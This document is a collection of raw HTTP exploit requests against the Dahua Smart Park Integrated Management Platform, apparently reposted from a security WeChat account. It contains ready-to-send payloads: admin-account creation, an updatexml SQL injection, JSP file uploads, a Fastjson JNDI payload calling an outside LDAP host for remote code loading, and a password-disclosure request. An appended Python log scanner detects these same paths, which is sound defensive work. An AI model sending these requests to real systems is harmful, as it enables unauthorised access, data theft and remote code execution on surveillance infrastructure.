POST /admin/user_save.action HTTP/1.1
Host:
Accept-Encoding: gzip
Content-Length: 914
Content-Type: multipart/form-data; boundary=----fxwrpqcy
Cookie: JSESSIONID=65A8F19555DC1EFB09B5A8B4F0F6921C
User-Agent: Go-http-client/1.1

------fxwrpqcy
Content-Disposition: form-data; name="userBean.userType"

0
------fxwrpqcy
Content-Disposition: form-data; name="userBean.ownerCode"

001
------fxwrpqcy
Content-Disposition: form-data; name="userBean.isReuse"

0
------fxwrpqcy
Content-Disposition: form-data; name="userBean.macStat"

0
------fxwrpqcy
Content-Disposition: form-data; name="userBean.roleIds"

1
------fxwrpqcy
Content-Disposition: form-data; name="userBean.loginName"

luqaahkf
------fxwrpqcy
Content-Disposition: form-data; name="displayedOrgName"

luqaahkf
------fxwrpqcy
Content-Disposition: form-data; name="userBean.loginPass"

lhndpuxl
------fxwrpqcy
Content-Disposition: form-data; name="checkPass"

lhndpuxl
------fxwrpqcy
Content-Disposition: form-data; name="userBean.groupId"

0
------fxwrpqcy
Content-Disposition: form-data; name="userBean.userName"

luqaahkf
------fxwrpqcy--
POST /WPMS/login HTTP/1.1
Host:
Accept-Encoding: gzip
Content-Length: 271
Content-Type: application/json
User-Agent: Go-http-client/1.1

{"loginName":"luqaahkf","loginPass":"IxID6I8gKNSkCgu5UMwfRAhZpyvKKzu9q+dUngiieHiCTA52x3/uNB17NmAOletbzTOT46fLE5AOOMqMaqdDLA5rcsB3/Gql1qYwbNWLB6orKWpWEr9asUeNi/3ccIb95NUAXS1yn0l3ks94jbGT/CYbNq+JiBAeYlwcfdrqYkM=","timestamp":"16853622671401904168273612873678126378126387"}
/admin/login_login.action?subSystemToken=87a629bc14298c1533d8b52dd63e87f7
/upload/axqvssmz.jsp
Dahua Smart Park Integrated Management Platform getFaceCapture SQL injection vulnerability
/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123)),0x7e),1)--%22%7D/extend/%7B%7D
Dahua Smart Park Integrated Management Platform searchJson SQL injection vulnerability
GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close
Dahua Smart Park Integrated Management Platform video file upload vulnerability
POST /publishing/publishing/material/file/video HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close

--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="0EaE10E7dF5F10C2.jsp"

<% contentType="text/html; charset=GBK"%><% import="java.math.BigInteger"%><% import="java.security.MessageDigest"%><% MessageDigest md5 = null;md5 = MessageDigest.getInstance("MD5");String s = "123456";String miyao = "";String jiamichuan = s + miyao;md5.update(jiamichuan.getBytes());String md5String = new BigInteger(1, md5.digest()).toString(16);out.println(md5String);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="poc"

poc
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"

submit
--dd8f988919484abab3816881c55272a7
Dahua Smart Park Integrated Management Platform devicePoint_addImgIco file upload vulnerability
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.69
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 243
Connection: close

--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="1ndex.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

123
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
Dahua Smart Park Integrated Management Platform deleteFtp endpoint remote command execution vulnerability
POST http://1.1.1.1/CardSolution/card/accessControl/swingCardRecord/deleteFtp HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) 5bGx5rW35LmL5YWz
Content-Length: 205
Content-Type: application/json
Accept-Encoding: gzip, deflate
Connection: close

{"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://cves.io","autoCommit":true}}}
Dahua Smart Park Integrated Management Platform arbitrary password disclosure vulnerability
GET /admin/login_login.action
GET /admin/user_getUserInfoByUserName.action?userName=system
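Added example (not part of the original post): a defender-side scan of web access logs for the request paths listed on this page. It assumes combined-log-format lines; the rule labels, the SQL marker pattern and the sample lines are constructed for illustration. Access logs do not record request bodies, so the POST rules match on path alone and each hit needs triage.

```python
import re
from urllib.parse import unquote, urlsplit

# (label, method, path regex, marker required in the decoded target or None).
# Paths come from the requests on this page; the SQL markers are an assumption.
RULES = [
    ("user_save.action user creation", "POST", r"^/admin/user_save\.action$", None),
    ("getFaceCapture SQL injection", "GET",
     r"^/portal/services/carQuery/getFaceCapture/searchJson/", r"(?i)updatexml|\bselect\b|--"),
    ("material/file/video upload", "POST", r"^/publishing/publishing/material/file/video$", None),
    ("devicePoint_addImgIco upload", "POST", r"^/emap/devicePoint_addImgIco$", None),
    ("deleteFtp JSON body", "POST", r"^/CardSolution/card/accessControl/swingCardRecord/deleteFtp$", None),
    ("user_getUserInfoByUserName", "GET", r"^/admin/user_getUserInfoByUserName\.action$", None),
    ("JSP served from /upload/", "GET", r"^/upload/[^/]+\.jsp$", None),
]
# Combined log format: client ... "METHOD target HTTP/x" status
LINE = re.compile(r'^(\S+) .*?"([A-Z]+) (\S+) HTTP/[\d.]+" (\d{3})')

def scan(lines):
    """Return (line_no, client, status, label) for every rule a log line matches."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = LINE.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        try:
            path = unquote(urlsplit(target).path)  # handles absolute-form targets too
        except ValueError:
            continue  # malformed target; cannot be one of the paths above
        decoded = unquote(target)  # turns %7B, %22, %20 back into { " space
        for label, want, path_re, marker in RULES:
            if (method == want and re.search(path_re, path)
                    and (marker is None or re.search(marker, decoded))):
                hits.append((no, client, int(status), label))
    return hits

# Constructed sample log lines (documentation addresses), not captured traffic.
P = '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] '
FC = '/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/'
SAMPLE = [
    P + '"GET ' + FC + '%7B%22orderBy%22:%221%20and%201=updatexml(1,1,1)--%22%7D/extend/%7B%7D HTTP/1.1" 500 0',
    P + '"GET ' + FC + '%7B%22orderBy%22:%22time%22%7D/extend/%7B%7D HTTP/1.1" 200 0',
    P + '"POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1" 200 0',
    P + '"GET /upload/example.jsp HTTP/1.1" 200 0',
    P + '"POST http://192.0.2.10/CardSolution/card/accessControl/swingCardRecord/deleteFtp HTTP/1.1" 200 0',
    P + '"GET /admin/login_login.action HTTP/1.1" 200 0',
]
```

A 200 response to a GET for a .jsp file under /upload/ is the hit to escalate first, since it indicates an uploaded file was served back by the application.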
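Originally published on the WeChat official account 左逆安全攻防: Dahua Smart Park Integrated Management Platform user_save.action arbitrary file upload vulnerability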